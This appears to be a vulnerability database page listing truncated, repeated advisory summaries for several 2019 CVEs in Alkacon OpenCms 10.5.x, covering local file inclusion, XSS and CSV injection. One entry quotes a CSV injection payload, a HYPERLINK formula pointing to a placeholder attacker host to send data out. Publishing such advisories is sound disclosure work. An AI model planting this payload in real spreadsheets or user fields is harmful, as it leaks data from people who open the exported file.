CVE-2019-13237

In Alkacon OpenCms 10.5.4 and 10.5.5, there are multiple resources vulnerable to Local File Inclusion that allow an attacker to access server resources: clearhistory.jsp, convertxml.jsp, groupnew.jsp, loginmessage.jsp, xmlcontentrepair.jsp, and /system/workplace/admin/history/settings/index.jsp...

CVE-2019-13237

CVE-2019-13237 affects Alkacon OpenCms 10.5.4 and 10.5.5, where Local File Inclusion allows access to server resources via multiple JSP endpoints (e.g., loginmessage.jsp, xmlcontentrepair.jsp, history/index.jsp, and others). The root cause is improper access control in resources such as clearhist...

CVE-2019-13236

In system/workplace/ in Alkacon OpenCms 10.5.4 and 10.5.5, there are multiple Reflected and Stored XSS issues in the management interface...

CVE-2019-13236

Alkacon OpenCms 10.5.4 and 10.5.5 are affected by multiple Reflected and Stored XSS vulnerabilities in the system/workplace/ management interface. Root cause is not explicitly detailed beyond XSS in the provided documents. The issues could allow execution of arbitrary scripts in authenticated use...

CVE-2019-13235

In the Alkacon OpenCms Apollo Template 10.5.4 and 10.5.5, there is XSS in the Login form...

CVE-2019-13235

CVE-2019-13235 affects Alkacon OpenCms Apollo Template 10.5.4 and 10.5.5, with a Cross-Site Scripting (XSS) flaw in the login form. Public sources describe the vulnerability as an XSS in the login workflow, with PoCs showing injection potentially via headers like X-Forwarded-For. NVD metrics list...

CVE-2019-13234

CVE-2019-13234 involves XSS in the Alkacon OpenCms Apollo Template, specifically in the search engine for OpenCms Apollo Template 10.5.4 and 10.5.5. The connected documents confirm a reflected XSS vulnerability in the search endpoint (e.g., parameter q) and also show a related XSS condition in a ...

CVE-2019-13234

In the Alkacon OpenCms Apollo Template 10.5.4 and 10.5.5, there is XSS in the search engine...

OpenCMS 10.5.4 Cross Site Scripting

Description: OpenCMS v10.5.4 and before is vulnerable to cross site scripting in New User module for parameter First Name and Last Name Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp Payload used in PoC is...

OpenCMS 10.5.4 CSV Injection

Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New User module for parameter First Name and Last Name Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp Payload used is '=HYPERLINK"http://attackerip:port/GiveMeSomeData","IAmSafe"'...

Code injection

Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...

Cross site scripting

Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...

CVE-2019-11819

Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...

CVE-2019-11818

Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...

CVE-2019-11819

Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...

CVE-2019-11818

Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...

CVE-2019-11819

Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...

CVE-2019-11819

CVE-2019-11819 affects Alkacon OpenCMS v10.5.4 and earlier. The vulnerability is a CSV (Excel Macro) Injection in the New User module (path: /opencms/system/workplace/admin/accounts/user_new.jsp) triggered via the First Name or Last Name fields. The connected documents confirm the same issue acro...

CVE-2019-11818

CVE-2019-11818 affects Alkacon OpenCMS v10.5.4 and earlier. The stored XSS vulnerability resides in the New User module (opencms/system/workplace/admin/accounts/user_new.jsp), allowing attackers to inject arbitrary JavaScript via First Name or Last Name fields; the payload is executed when the af...

CVE-2019-11818

Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...